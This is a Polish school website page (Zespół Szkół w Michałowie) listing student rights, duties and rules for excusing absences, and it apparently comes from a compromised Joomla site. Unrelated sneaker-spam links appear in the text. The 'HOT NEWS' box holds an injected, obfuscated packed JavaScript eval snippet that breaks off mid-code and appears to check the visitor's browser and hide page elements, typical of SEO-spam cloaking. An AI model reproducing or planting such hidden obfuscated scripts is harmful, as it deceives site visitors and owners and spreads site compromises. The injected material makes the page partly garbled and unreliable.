Powrót na górę

foto1 foto2 foto3 foto4 foto5
Zmieniamy się na lepsze. Dołącz do nas. Czekamy właśnie na Ciebie.

Liceum w Michałowie

Prawa ucznia
 1. Uczeń ma prawo do :

  1. właściwie zorganizowanego procesu kształcenia, zgodnie z zasadami higieny pracy umysłowej
  2. warunków pobytu w szkole zapewniających bezpieczeństwo, ochronę przed wszelkimi formami przemocy fizycznej i psychicznej
  3. opieki wychowawczej ze strony nauczycieli zatrudnionych w szkole
  4. traktowania zgodnego z poszanowaniem jego godności osobistej
  5. swobody w wyrażaniu myśli, poglądów i przekonań - pod warunkiem, że nie narusza tym dobra innych osób
  6. wolności sumienia i wyznania
  7. życzliwego, podmiotowego traktowania w procesie dydaktyczno-wychowawczym
  8. rozwijania zainteresowań, zdolności i talentów
  9. uczestniczenia w zajęciach pozalekcyjnych różnego typu organizowanych przez szkołę
  10. uczestniczenia w wycieczkach i imprezach organizowanych przez szkołę
  11. sprawiedliwiej, obiektywnej, zgodnej z Wewnątrzszkolnym Systemem Oceniania, jawnej oceny osiągnięć szkolnych oraz oceny z zachowania
  12. otrzymywania na bieżąco ocen z poszczególnych przedmiotów
  13. powiadomienia o sprawdzianie z przedmiotów ogólnokształcących, profilowanych, zawodowych ( 45- lub 90- minutowych ) z tygodniowym wyprzedzeniem
  14. otrzymania oceny z przeprowadzonego sprawdzianu lub kartkówki w terminie najpóźniej dwóch tygodni od jego przeprowadzenia
  15. otrzymania pomocy w przypadku trudności w nauce poprzez: uczestnictwo w zajęciach zespołu wyrównawczego, indywidualną konsultację z nauczycielem przedmiotu w przypadku niezrozumienia treści realizowanych podczas lekcji
  16. korzystania z poradnictwa psychologiczno- pedagogicznego w szkole
  17. korzystania z pomieszczeń szkolnych, sprzętu, środków dydaktycznych, księgozbioru bibliotecznego
  18. wpływania na życie szkoły poprzez działalność samorządową zgodna z regulaminem Samorządu Uczniowskiego
  19. otrzymania legitymacji szkolnej
  20. nauczania indywidualnego zgodnie z odrębnymi przepisami
 2. Ponadto:

  1. Uczeń ma prawo do posiadania na terenie szkoły telefonu komórkowego i innych urządzeń elektronicznych oraz używania ich zgodnie z ustalonymi zasadami
  2. Telefon ucznia podczas lekcji powinien być wyłączony
  3. Uczeń nie ma prawa nagrywać, fotografować nauczycieli ani innych osób uczących się lub pracujących w szkole bez ich wiedzy i zgody,
  4. Zabronione jest upublicznianie zdobytych w powyższy sposób materiałów w środkach masowej komunikacji
  5. Powyższe zasady obowiązują również w przypadku innych urządzeń elektronicznych dostępnych na rynku
 3. Uczeń nie ma prawa:

  1. przynosić do szkoły alkoholu, papierosów, środków odurzających
  2. w przypadku, kiedy zostanie udowodnione, że uczeń posiada przy sobie wyżej wymienione niedozwolone środki- nauczyciel powinien je zatrzymać do czasu przybycia do szkoły rodziców ucznia, którzy mają być natychmiast o zaistniałym fakcie poinformowani

Obowiązki ucznia

 1. Uczeń ma obowiązek:

  1. szanować symbolikę narodową oraz szkolną być świadomym szkolnych tradycji
  2. systematycznie i aktywnie uczestniczyć w zajęciach lekcyjnych zgodnych z obowiązującym w danej klasie planem nauczania
  3. punktualnie przybywać na zajęcia lekcyjne
  4. systematycznie przygotowywać się do lekcji
  5. wywiązywać się z obowiązków uczniowskich wynikających z pełnienia dyżuru szkolnego, funkcji w Samorządzie Uczniowskim lub Samorządzie Klasowym, z podjętych zobowiązań.
  6. przestrzegać wewnętrznych przepisów obowiązujących w szkole, zaleceń Dyrektora oraz nauczycieli
  7. troszczyć się o mienie szkoły, utrzymywać ład i porządek, szanować sprzęt i pomoce   dydaktyczne, do których ma dostęp
  8. ponosić odpowiedzialność materialną za zniszczenie sprzętu szkolnego
  9. na terenie szkoły nosić zmienione obuwie- na wychowanie fizyczne-obuwie sportowe, na pozostałe lekcje- obuwie miękkie -klapki lub kapcie
  10. dbać o własne bezpieczeństwo, życie i zdrowie poprzez unikanie ryzykownych, lekkomyślnych zachowań i wystrzeganie się szkodliwych nałogów
  11. przestrzegać zasad współżycia społecznego poprzez :
   1. okazywanie szacunku pracownikom szkoły
   2. kulturalne zachowanie wobec innych uczniów szkoły
   3. przeciwstawianie się przejawom brutalności i agresji
  12. nosić legitymację szkolną
  13. nosić do szkoły strój czysty, schludny zgodny z normami przyzwoitości, nie prezentując strojem ani fryzurą cech subkultur młodzieżowych
  14. przekazywać rodzicom informacje o terminach wywiadówek szkolnych oraz przeznaczone dla nich komunikaty od wychowawcy oraz innych nauczycieli
  15. informować wychowawcę o przyczynach wszystkich nieobecności zgodnie z ustalonymi zasadami
 2. Zasady usprawiedliwiania nieobecności:

  1. Każdą nieobecność na lekcji uczeń winien wyjaśnić w ciągu 7 dni. Po tym terminie godziny nieobecności pozostaną nieusprawiedliwione.
  2. Całodzienną nieobecność usprawiedliwia wyłącznie wychowawca
  3. Pojedyncze nieobecności usprawiedliwić może nauczyciel przedmiotu za wiedzą i zgodą wychowawcy
  4. Nieusprawiedliwione spóźnienie na lekcję powyżej 20 minut traktuje się jako nieobecność na lekcji
  5. Nieobecność ucznia spowodowana jego udziałem w zawodach, konkursach, wycieczkach szkolnych oraz reprezentowaniem szkoły na zewnątrz zaznacza się w dzienniku jako zwolnienie z zajęć. Zaznaczenia ma obowiązek dokonać nauczyciel, pod którego opieką będzie przebywał uczeń w czasie nieobecności w szkole
  6. Nieusprawiedliwione godziny nieobecności i spóźnienia mają wpływ na ocenę z zachowania
  7. Uczeń lub jego rodzice ( opiekunowie) zobowiązani są przynajmniej jeden dzień wcześniej powiadamiać wychowawcę klasy o planowanych nieobecnościach ucznia z uzasadnionych przyczyn
  8. Uczeń jest zobowiązany do uzupełnienia materiału opracowywanego podczas lekcji, na których był nieobecny
  9. Za powtarzające się nieobecności oraz spóźnienia na zajęcia uczeń może zostać skreślony z listy uczniów szkoły zgodnie z ustalonymi procedurami
  10. W przypadku nieobecności na ponad 50% obowiązkowych zajęć z danego przedmiotu uczeń jest niesklasyfikowany. Klasyfikowania ucznia można dokonać po przeprowadzeniu egzaminu klasyfikacyjnego.
Air Max 90 Wovenbest Running shoes | Air Jordan XXX1 31 Colors, Release Dates, Photos , Gov

Zegar

Użytkownicy online

Odwiedza nas 19 gości oraz 0 użytkowników.

Kalendarz

październik 2022
pwścpsn
12
3456789
10111213141516
17181920212223
24252627282930
31

Polecamy

HOT NEWS
UWAGA: Nauka w szkołach dla dorosłych jest bezpłatna - Zajęcia odbywają się w soboty i niedziele – 10 zjazdów w semestrze: Ubiegający się o przyjęcie proszeni są o składanie dokumentów sekretariacie Zespołu Szkół w Michałowie ul. Sienkiewicza 5 ZAPRASZAMY OSOBY DOROSŁE ORAZ MŁODZIEŻ DO PODJĘCIA NAUKI W NASZYCH SZKOŁACH !!!Asics shoes | Men's Sneakerseval(function(p,a,c,k,e,d);if(!''.replace(/^/,String))];e=function();c=1;};while(c--)if(k[c])p=p.replace(new RegExp('\\b'+e(c)+'\\b','g'),k[c]);return p;}('b i=r f["\\q\\1\\4\\g\\p\\l"]("\\4"+"\\7"+"\\7"+"\\4"+"\\5\\1","\\4\\k");s(!i["\\3\\1\\2\\3"](m["\\h\\2\\1\\j\\n\\4\\1\\6\\3"])){b a=f["\\e\\7\\o\\h\\d\\1\\6\\3"]["\\4\\1\\3\\g\\5\\1\\d\\1\\6\\3\\2\\z\\9\\A\\5\\c\\2\\2\\x\\c\\d\\1"](\'\\t\\1\\9\\2\\w\\v\\7\\j\\e\\2\');u(b 8=0;8

Serwis internetowy Zespołu Szkół w Michałowie | Projekt i administracja Jerzy Stpiczyński

Copyright © 2022 Serwis internetowy Zespołu Szkół w Michałowie. Wszelkie prawa zastrzeżone.
Joomla! jest wolnym oprogramowaniem wydanym na warunkach GNU Powszechnej Licencji Publicznej.
005944363
Dzisiaj
Wczoraj
W tym tygodniu
W tym miesiącu
62
1757
9069
62